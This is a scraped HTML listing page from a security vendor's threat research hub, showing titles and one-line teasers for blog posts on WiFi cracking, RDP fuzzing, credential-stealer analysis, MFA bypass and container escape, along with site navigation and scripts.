<div class="img" id="tileImagePreview668493470"><img alt="Cracking WiFi at Scale with One Simple Trick" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F10%2FWifi-cracking-blog-header-image.png&size=1&version=1640142384&sig=c0d05fdcdfd923e4b68b080bb7a0c628&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-10-26T12:00:00"></abbr></div> <div class="h3like  ">Cracking WiFi at Scale with One Simple Trick</div>
<h4 class="long-h3"><p>How I Cracked 70% of Tel Aviv&rsquo;s Wifi Networks (from a Sample of 5,000 Gathered WiFi). In the past seven years that I&rsquo;ve lived in Tel Aviv, I&rsquo;ve changed apartments four times. Every time I...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick" data-page-title="Cracking WiFi at Scale with One Simple Trick" data-seo-title="Cracking WiFi at Scale with One Simple Trick" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick" data-internal="blogpost" data-seo-title="Cracking WiFi at Scale with One Simple Trick" data-page-title="Cracking WiFi at Scale with One Simple Trick"></a>
</div>
<div data-id="665345090" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview665345090"><img alt="Fuzzing RDP: Holding the Stick at Both Ends" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F08%2Fheader-image_stick.jpeg&size=1&version=1646369720&sig=56861456d57a7a1d2b862e71e4aa3976&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-03-03T23:55:20"></abbr></div> <div class="h3like  ">Fuzzing RDP: Holding the Stick at Both Ends</div>
<h4 class="long-h3"><p>Introduction This post describes the work we&rsquo;ve done on fuzzing the Windows RDP client and server, the challenges of doing so, and some of the results. The Remote Desktop Protocol (RDP) by...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/fuzzing-rdp-holding-the-stick-at-both-ends" data-page-title="Fuzzing RDP: Holding the Stick at Both Ends" data-seo-title="Fuzzing RDP: Holding the Stick at Both Ends" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/fuzzing-rdp-holding-the-stick-at-both-ends" data-internal="blogpost" data-seo-title="Fuzzing RDP: Holding the Stick at Both Ends" data-page-title="Fuzzing RDP: Holding the Stick at Both Ends"></a>
</div>
<div data-id="662182910" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview662182910"><img alt="FickerStealer: A New Rust Player in the Market" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F07%2FOption-1.png&size=1&version=1640142383&sig=3da6abe1977da2621c7b6d32a438858f&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-07-19T15:06:00"></abbr></div> <div class="h3like  ">FickerStealer: A New Rust Player in the Market</div>
<h4 class="long-h3"><p>This blog introduces a new information stealer, written in Rust and interestingly named FickerStealer. In this blog post, we provide an in-depth analysis of this new threat and its obfuscation...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market" data-page-title="FickerStealer: A New Rust Player in the Market" data-seo-title="FickerStealer: A New Rust Player in the Market" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market" data-internal="blogpost" data-seo-title="FickerStealer: A New Rust Player in the Market" data-page-title="FickerStealer: A New Rust Player in the Market"></a>
</div>
<div data-id="661632548" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview661632548"><img alt="Bypassing Windows Hello Without Masks or Plastic Surgery" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F07%2FBypassing-Microsoft-Windows-Hello.png&size=1&version=1640142383&sig=ae58caab4be7494d008b8e691fed433c&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-07-13T14:49:00"></abbr></div> <div class="h3like  ">Bypassing Windows Hello Without Masks or Plastic Surgery</div>
<h4 class="long-h3"><p>Biometric authentication is beginning to see rapid adoption across the enterprise as organizations look to incorporate passwordless solutions to help mitigate the numerous security risks inherent...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery" data-page-title="Bypassing Windows Hello Without Masks or Plastic Surgery" data-seo-title="Bypassing Windows Hello Without Masks or Plastic Surgery" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery" data-internal="blogpost" data-seo-title="Bypassing Windows Hello Without Masks or Plastic Surgery" data-page-title="Bypassing Windows Hello Without Masks or Plastic Surgery"></a>
</div>
<div data-id="658390712" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview658390712"><img alt="Best Defense? Our Red Team Lead Reveals 4 MFA Bypass Techniques" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F06%2FMFA-Bypass-Techniques.png&size=1&version=1640142383&sig=e63b1efb7ffa09db8e0dda3b5fa73398&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-06-08T14:59:00"></abbr></div> <div class="h3like  ">Best Defense? Our Red Team Lead Reveals 4 MFA Bypass Techniques</div>
<h4 class="long-h3"><p>Digital transformation, widespread remote work due to the COVID-19 pandemic and ever-increasing reliance on cloud services and infrastructure have all contributed to new enterprise access...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/mfa-bypass-techniques-from-red-team-research" data-page-title="Best Defense? Our Red Team Lead Reveals 4 MFA Bypass Techniques" data-seo-title="Best Defense? Our Red Team Lead Reveals 4 MFA Bypass Techniques" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/mfa-bypass-techniques-from-red-team-research" data-internal="blogpost" data-seo-title="Best Defense? Our Red Team Lead Reveals 4 MFA Bypass Techniques" data-page-title="Best Defense? Our Red Team Lead Reveals 4 MFA Bypass Techniques"></a>
</div>
<div data-id="656258083" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview656258083"><img alt="Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F05%2FOne-Way-Alternate.jpeg&size=1&version=1640142383&sig=f806a545968860d6ec5559fb8af8fffd&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-05-17T18:32:00"></abbr></div> <div class="h3like  ">Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2</div>
<h4 class="long-h3"><p>In Part 1 of this blog post, we discussed attack vectors that utilize the different features of the devices that network plugins use, such as bridge devices and tunneling devices (VXLAN in...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-2" data-page-title="Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2" data-seo-title="Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-2" data-internal="blogpost" data-seo-title="Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2" data-page-title="Attacking Kubernetes Clusters Through Your Network Plumbing: Part 2"></a>
</div>
<div data-id="655879639" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview655879639"><img alt="Virtual Cloak: Virtualization as Malware" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F05%2FFigure1b.jpg&size=1&version=1640142383&sig=dc65cf4dad6127231de7d1cbbc6475b7&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-05-13T17:46:00"></abbr></div> <div class="h3like  ">Virtual Cloak: Virtualization as Malware</div>
<h4 class="long-h3"><p>Virtualization is a double-edged sword The glorious rise of the cloud in recent years could be attributed to the gradual advancement of many different technologies, both hardware and software...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/virtual-cloak-virtualization-as-malware" data-page-title="Virtual Cloak: Virtualization as Malware" data-seo-title="Virtual Cloak: Virtualization as Malware" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/virtual-cloak-virtualization-as-malware" data-internal="blogpost" data-seo-title="Virtual Cloak: Virtualization as Malware" data-page-title="Virtual Cloak: Virtualization as Malware"></a>
</div>
<div data-id="652568158" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview652568158"><img alt="Kubesploit: A New Offensive Tool for Testing Containerized Environments" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F04%2FKubesploit-Open-Source.jpeg&size=1&version=1640142383&sig=bd72a4d3b29fd37708ecca66a16a66fa&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-04-08T12:45:00"></abbr></div> <div class="h3like  ">Kubesploit: A New Offensive Tool for Testing Containerized Environments</div>
<h4 class="long-h3"><p>In this blog post, we will introduce a new open-source tool we developed, named Kubesploit, for testing Kubernetes environments. This is a full framework, dedicated to Kubernetes, to assist...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/kubesploit-a-new-offensive-tool-for-testing-containerized-environments" data-page-title="Kubesploit: A New Offensive Tool for Testing Containerized Environments" data-seo-title="Kubesploit: A New Offensive Tool for Testing Containerized Environments" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/kubesploit-a-new-offensive-tool-for-testing-containerized-environments" data-internal="blogpost" data-seo-title="Kubesploit: A New Offensive Tool for Testing Containerized Environments" data-page-title="Kubesploit: A New Offensive Tool for Testing Containerized Environments"></a>
</div>
<div data-id="650541901" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview650541901"><img alt="The Mysterious Realm of JavaScriptCore" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F03%2FThe-Realm-of-JavaScriptCore.jpeg&size=1&version=1646897450&sig=0229b68d3737acf32f61173f0967ea51&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-03-10T02:30:50"></abbr></div> <div class="h3like  ">The Mysterious Realm of JavaScriptCore</div>
<h4 class="long-h3"><p>TL;DR JavaScriptCore (JSC) is the JavaScript engine used by Safari, Mail, App Store and many other apps in MacOs. The JSC engine is responsible for executing every line of JavaScript (JS) that...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/the-mysterious-realm-of-javascriptcore" data-page-title="The Mysterious Realm of JavaScriptCore" data-seo-title="The Mysterious Realm of JavaScriptCore" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/the-mysterious-realm-of-javascriptcore" data-internal="blogpost" data-seo-title="The Mysterious Realm of JavaScriptCore" data-page-title="The Mysterious Realm of JavaScriptCore"></a>
</div>
<div data-id="649387958" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview649387958"><img alt="The Strange Case of How We Escaped the Docker Default Container" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F02%2FThe-Strange-Case-of-the-Docker-Container.jpeg&size=1&version=1640142383&sig=a9581ceb752d606187fcd6edcc5a7260&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-03-04T13:45:00"></abbr></div> <div class="h3like  ">The Strange Case of How We Escaped the Docker Default Container</div>
<h4 class="long-h3"><p>TL;DR During an internal container-based Red Team engagement, the Docker default container spontaneously and silently changed cgroups overnight, which allowed us to escalate privileges and gain...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/the-strange-case-of-how-we-escaped-the-docker-default-container" data-page-title="The Strange Case of How We Escaped the Docker Default Container" data-seo-title="The Strange Case of How We Escaped the Docker Default Container" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/the-strange-case-of-how-we-escaped-the-docker-default-container" data-internal="blogpost" data-seo-title="The Strange Case of How We Escaped the Docker Default Container" data-page-title="The Strange Case of How We Escaped the Docker Default Container"></a>
</div>
<div data-id="646665328" data-source-stream-id="6824673" data-tags="Secure Cloud Environments,Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview646665328"><img alt="Hunting Azure Blobs Exposes Millions of Sensitive Files" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F02%2FCloud-storage-misconfiguration-risk.jpeg&size=1&version=1646355419&sig=615a07a53be2ba6316f1d7ba4f896038&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2022-03-03T19:56:59"></abbr></div> <div class="h3like  ">Hunting Azure Blobs Exposes Millions of Sensitive Files</div>
<h4 class="long-h3"><p>We hear about it all the time &ndash; data breaches that expose a company&rsquo;s sensitive information. Nearly all of us have been warned that our passwords, email addresses or even credit cards have...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/hunting-azure-blobs-exposes-millions-of-sensitive-files" data-page-title="Hunting Azure Blobs Exposes Millions of Sensitive Files" data-seo-title="Hunting Azure Blobs Exposes Millions of Sensitive Files" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/hunting-azure-blobs-exposes-millions-of-sensitive-files" data-internal="blogpost" data-seo-title="Hunting Azure Blobs Exposes Millions of Sensitive Files" data-page-title="Hunting Azure Blobs Exposes Millions of Sensitive Files"></a>
</div>
<div data-id="644046436" data-source-stream-id="6824673" data-tags="Threat Research,Threat Research Blog,Blog" class="tile single blogpost stream-6824673 with-img uf-aspect-ratio-fix">
<div class="img" id="tileImagePreview644046436"><img alt="Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer" src="https://content.cdntwrk.com/mediaproxy?url=https%3A%2F%2Fwww.cyberark.com%2Fwp-content%2Fuploads%2F2021%2F01%2FOski-Credential-Stealer-Malware-Blog-Image.jpeg&size=1&version=1640142383&sig=75bb13f940c9e8a43748a31e23351df3&default=hubs%2Ftilebg-blogs.jpg"></div> <div class="description">
<div class="friendly-timestamp"><abbr class="timeago" title="2021-01-07T13:34:00"></abbr></div> <div class="h3like  ">Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer</div>
<h4 class="long-h3"><p>Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer Credential theft malware continues to be one of the most prevalent types of malware used in cyber attacks. The main...</p>
</h4>
</div>
<a class="item-link view" href="https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer" data-page-title="Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer" data-seo-title="Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer" data-internal="blogpost">
Read Article </a>
<a class="item-link" href="https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer" data-internal="blogpost" data-seo-title="Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer" data-page-title="Meet Oski Stealer: An In-depth Analysis of the Popular Credential Stealer"></a>
</div>
</div>
</div>
</div>
</section>
<section class="level-three bottom">
<a href="https://www.cyberark.com/resources/" data-internal="standard" data-page-title="Update Your Security I.Q. - CyberArk Resource Center">
Return to Home </a>
</section>
</div>

</div>
<script>
    
            var Hubs = window.Hubs || {};
            Hubs.recommendation = {"enabled":false,"isRecommendationFound":null};

</script>
</div>
<div id="moveToTop"><a href="#top" data-internal="false">&nbsp;</a></div>
</div>


<footer id="bottom-footer">
<div class="copyright">© CyberArk Software Inc</div>
</footer>


<div id="left-nav-phone">
<div class="mobile-nav">
<div class="exit-bar">
<a class="exit" href="javascript:void(0)">&times;</a>
<span class="title">Streams</span>
</div>
<div class="overlay-scroller">
<ul>
<li class="menu-home custom-menu-item ">
<a href="https://www.cyberark.com/resources/" data-internal="home" data-page-title="Update Your Security I.Q. - CyberArk Resource Center">
Home </a>
</li>
<li class="menu-docs collapsed custom-menu-item ">
 <a href="javascript:void(0)">Products &amp; Services</a>
<div class="collapsable-section">
<ul>
<li class="custom-menu-item " data-collection-id="6426408">
<a href="https://www.cyberark.com/resources/privilege-on-premises" data-page-title="Privilege on-Premises" data-internal="stream">
Privilege On Premises </a>
</li>
<li class="custom-menu-item " data-collection-id="7403353">
<a href="https://www.cyberark.com/resources/cyberark-identity" data-page-title="CyberArk Identity" data-internal="stream">
CyberArk Identity </a>
</li>
<li class="custom-menu-item Cloud Entitlements Manager" data-collection-id="7427482">
<a href="https://www.cyberark.com/resources/cloud-entitlements-manager" data-page-title="Cloud Entitlements Manager" data-internal="stream">
Cloud Entitlements Manager </a>
</li>
<li class="custom-menu-item " data-collection-id="6426411">
<a href="https://www.cyberark.com/resources/vendor-privileged-access-manager" data-page-title="Vendor Privileged Access Manager" data-internal="stream">
Vendor Privileged Access Manager </a>
</li>
<li class="custom-menu-item " data-collection-id="6426414">
<a href="https://www.cyberark.com/resources/conjur-secrets-manager-enterprise" data-page-title="Conjur Secrets Manager Enterprise" data-internal="stream">
Conjur Secrets Manager Enterprise </a>
</li>
<li class="custom-menu-item " data-collection-id="6426417">
<a href="https://www.cyberark.com/resources/endpoint-privilege-manager" data-page-title="Endpoint Privilege Manager​" data-internal="stream">
Endpoint Privilege Manager​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426420">
<a href="https://www.cyberark.com/resources/cyberark-privilege-cloud" data-page-title="CyberArk Privilege Cloud​" data-internal="stream">
CyberArk Privilege Cloud​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426423">
<a href="https://www.cyberark.com/resources/assessment-tools" data-page-title="Assessment Tools​" data-internal="stream">
Assessment Tools​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426426">
<a href="https://www.cyberark.com/resources/services-support" data-page-title="Services &amp; Support​" data-internal="stream">
Services &amp; Support​ </a>
</li>
</ul>
</div>
</li>
<li class="menu-docs collapsed custom-menu-item two-column">
<a href="javascript:void(0)">Topics</a>
<div class="collapsable-section">
<ul>
<li class="custom-menu-item " data-collection-id="6426429">
<a href="https://www.cyberark.com/resources/automate-privileged-tasks" data-page-title="Automate Privileged Tasks" data-internal="stream">
Automate Privileged Tasks </a>
</li>
<li class="custom-menu-item " data-collection-id="6426432">
<a href="https://www.cyberark.com/resources/best-practices-for-privileged-access-management" data-page-title="Best Practices for Privileged Access Management" data-internal="stream">
Best Practices for Privileged Access Management </a>
</li>
<li class="custom-menu-item " data-collection-id="6426435">
<a href="https://www.cyberark.com/resources/meet-audit-and-compliance" data-page-title="Meet Audit and Compliance" data-internal="stream">
Meet Audit and Compliance </a>
</li>
<li class="custom-menu-item " data-collection-id="6426438">
<a href="https://www.cyberark.com/resources/mitigate-risk-with-just-in-time-and-least-privilege" data-page-title="Mitigate Risk With Just-in-Time and Least Privilege" data-internal="stream">
Mitigate Risk With Just-in-Time and Least Privilege </a>
</li>
<li class="custom-menu-item " data-collection-id="6426441">
<a href="https://www.cyberark.com/resources/remove-local-admin-rights-on-workstations" data-page-title="Remove Local Admin Rights on Workstations" data-internal="stream">
Remove Local Admin Rights on Workstations </a>
</li>
<li class="custom-menu-item " data-collection-id="6426447">
<a href="https://www.cyberark.com/resources/secure-application-credentials" data-page-title="Secure Application Credentials" data-internal="stream">
Secure Application Credentials </a>
</li>
<li class="custom-menu-item " data-collection-id="6426450">
<a href="https://www.cyberark.com/resources/secure-cloud-environments" data-page-title="Secure Cloud Environments" data-internal="stream">
Secure Cloud Environments </a>
</li>
<li class="custom-menu-item " data-collection-id="6426453">
<a href="https://www.cyberark.com/resources/secure-devops-pipelines-and-cloud-native-apps" data-page-title="Secure DevOps Pipelines and Cloud Native Apps" data-internal="stream">
Secure DevOps Pipelines and Cloud Native Apps </a>
</li>
<li class="custom-menu-item " data-collection-id="6426456">
<a href="https://www.cyberark.com/resources/secure-human-privileged-access" data-page-title="Secure Human Privileged Access" data-internal="stream">
Secure Human Privileged Access </a>
</li>
<li class="custom-menu-item " data-collection-id="6426459">
 <a href="https://www.cyberark.com/resources/secure-rpa-workloads" data-page-title="Secure RPA Workloads" data-internal="stream">
Secure RPA Workloads </a>
</li>
<li class="custom-menu-item " data-collection-id="6426462">
<a href="https://www.cyberark.com/resources/secure-third-party-vendor-and-remote-access" data-page-title="Secure Third-Party Vendor and Remote Access" data-internal="stream">
Secure Third-Party Vendor and Remote Access </a>
</li>
<li class="custom-menu-item " data-collection-id="7403356">
<a href="https://www.cyberark.com/resources/secure-workforce-access" data-page-title="Secure Workforce Access" data-internal="stream">
Secure Workforce Access </a>
</li>
<li class="custom-menu-item " data-collection-id="6426465">
<a href="https://www.cyberark.com/resources/threat-research" data-page-title="Threat Research​" data-internal="stream">
Threat Research​ </a>
</li>
</ul>
</div>
 </li>
<li class="menu-docs collapsed custom-menu-item ">
<a href="javascript:void(0)">Industry</a>
<div class="collapsable-section">
<ul>
<li class="custom-menu-item " data-collection-id="6426468">
<a href="https://www.cyberark.com/resources/financial-services" data-page-title="Financial Services ​&amp; Insurance " data-internal="stream">
Financial Services ​&amp; Insurance </a>
</li>
<li class="custom-menu-item " data-collection-id="6426471">
<a href="https://www.cyberark.com/resources/healthcare" data-page-title="Healthcare​" data-internal="stream">
Healthcare​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6426477">
<a href="https://www.cyberark.com/resources/public-sector-government" data-page-title="Public Sector &amp; Government ​" data-internal="stream">
Public Sector &amp; Government ​ </a>
</li>
</ul>
</div>
</li>
<li class="menu-docs collapsed custom-menu-item ">
<a href="javascript:void(0)">Content Type</a>
<div class="collapsable-section">
<ul>
 <li class="custom-menu-item " data-collection-id="5950137">
<a href="https://www.cyberark.com/resources/analyst-reports" data-page-title="Analyst Reports" data-internal="stream">
Analyst Reports &amp; Research​ </a>
</li>
<li class="custom-menu-item " data-collection-id="7020912">
<a href="https://www.cyberark.com/resources/all-blog-posts" data-page-title="Blog Posts" data-internal="stream">
Blog Posts </a>
</li>
<li class="custom-menu-item " data-collection-id="5950143">
<a href="https://www.cyberark.com/resources/case-studies" data-page-title="Case Studies" data-internal="stream">
Case Studies​ </a>
</li>
<li class="custom-menu-item " data-collection-id="5950146">
<a href="https://www.cyberark.com/resources/ebooks" data-page-title="eBooks" data-internal="stream">
eBooks​ </a>
</li>
 <li class="custom-menu-item " data-collection-id="5950149">
<a href="https://www.cyberark.com/resources/infographics" data-page-title="Infographics" data-internal="stream">
Infographics​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6824736">
<a href="https://www.cyberark.com/resources/webinars" data-page-title="Webinars" data-internal="stream">
On-Demand Events &amp; Webinars </a>
</li>
<li class="custom-menu-item " data-collection-id="7699537">
<a href="https://www.cyberark.com/resources/product-announcements" data-page-title="Product Announcements" data-internal="stream">
Product Announcements </a>
</li>
<li class="custom-menu-item " data-collection-id="5950140">
<a href="https://www.cyberark.com/resources/product-datasheets" data-page-title="Product Datasheets" data-internal="stream">
Product Datasheets​ </a>
 </li>
<li class="custom-menu-item " data-collection-id="5950152">
<a href="https://www.cyberark.com/resources/solution-briefs" data-page-title="Solution Briefs" data-internal="stream">
Solution Briefs​ </a>
</li>
<li class="custom-menu-item " data-collection-id="6824724">
<a href="https://www.cyberark.com/resources/videos" data-page-title="Videos" data-internal="stream">
Videos </a>
</li>
<li class="custom-menu-item " data-collection-id="5950161">
<a href="https://www.cyberark.com/resources/white-papers" data-page-title="White Papers" data-internal="stream">
Whitepapers​ </a>
</li>
</ul>
</div>
</li>
<li class="menu-docs custom-menu-item " data-collection-id="7105730">
<a href="https://www.cyberark.com/resources/customer-stories" data-page-title="Customer Stories" data-internal="custom">
Customer Stories </a>
</li>
</ul>
</div>
</div>
</div>

<div id="loading-overlay"><div class="loading-indicator"><img class="loading" alt="loading" src="https://content.cdntwrk.com/img/hubs/ajax-loader-white-2x.gif?v=19a554b579c4" width="32"></div></div>
<ul class="share-hub" id="share-main-hub">
<li>Share this Hub</li>
<li><a class="facebook on" data-share="facebook" href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.cyberark.com%2Fresources%2F">Facebook</a></li> <li><a class="twitter on" data-share="twitter" href="https://twitter.com/share?text=Check%20out%20what%27s%20happening%20at%20CyberArk%21&amp;url=https%3A%2F%2Fwww.cyberark.com%2Fresources%2F&amp;via=CyberArk">Twitter</a></li>
<li><a class="email on" data-share="email" href="/cdn-cgi/l/email-protection#80bff4efbda6e1edf0bbf3f5e2eae5e3f4bdc5eee7ece9f3e8a5b2b0a5c5b2a5b8b0a5b9b3a5b2b0c3f9e2e5f2c1f2eba5b2b0d3efe6f4f7e1f2e5a5b2b0c9eee3a5b2b7f3a5b2b0c8f5e2a5b2b0e8e1f3a5b2b0e2e5e5eea5b2b0f3e8e1f2e5e4a5b2b0f7e9f4e8a5b2b0f9eff5a6e1edf0bbe2efe4f9bdc3e8e5e3eba5b2b0eff5f4a5b2b0f7e8e1f4a5b2b7f3a5b2b0e8e1f0f0e5eee9eee7a5b2b0e1f4a5b2b0c3f9e2e5f2c1f2eba5b2b1a5b0c1a5b0c1e8f4f4f0f3a5b3c1a5b2c6a5b2c6f7f7f7aee3f9e2e5f2e1f2ebaee3efeda5b2c6f2e5f3eff5f2e3e5f3a5b2c6">Email</a></li> <li><a class="linkedin on" data-share="linkedin" href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.cyberark.com%2Fresources%2F&amp;title=English%20%E2%80%93%20CyberArk%20Software%20Inc%27s&amp;summary=Check%20out%20what%27s%20happening%20at%20CyberArk%21">LinkedIn</a></li> </ul>
<div class="search-drop-down">
<div class="overlay-scroller"></div>
<div class="arrow"><span></span></div>
</div>
<div class="mobile-search-header">
<span class="search-icon"><span></span></span>
<span class="search-input"><input type="text" name="mq" value="" placeholder="Search" autocomplete="off"></span>
<span class="search-close"><span>&times;</span></span>
</div>

<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
   // Uses in a mixed content situation, letting parent know it's loaded
  if(!!window.postMessage){
      window.parent.postMessage('loaded', '*');
  }

  // Called when a Parent Window of an Embedded IFrame has Initial Load Data
  function g_iFrameLoadDataCallback(loadData) {
      $('window').trigger('loadData', [loadData]);
  }

  // Called when a Parent Window of an Embedded IFrame is Scrolled
  function g_iFrameScrollCallback(scrollTop, offsetTop, viewportX, viewportY) {
      $('window').trigger('scroll', [scrollTop, offsetTop, viewportX, viewportY]);
  }
</script><script src="https://content.cdntwrk.com/js/hubs/hubs_app.604ab7f142b29812da2c.js"></script> <script>
        Hubs.appInstance = new Hubs.App({
            'serverTimestamp'  : 1648576576,
            'accountId'        : '554470',
            'hubId'            : '108540',
            'streamId'         : '6824673',
            'itemId'           : '649887751',
            'authorId'         : '',
            'hubTitle'         : '&quot;English \u2013 CyberArk Software Inc&quot;',
            'hubBaseUrl'       : 'https://www.cyberark.com/resources/',
            'pardotCookie'     : '',
            'serverUrl' : {
                'hub'               : 'https://www.cyberark.com/resources/',
                'cdn'               : 'https://content.cdntwrk.com/',
                'ufa'              : 'https://ufa.uberflip.com'
            },
            'lazyloader' : {
                'itemDisplayLimit' : 20,
                'itemLoadCount'    : 20,
                'featuredItemCount': 4            },

            'search' : {
                'enabled' : true,
                'labels' : {
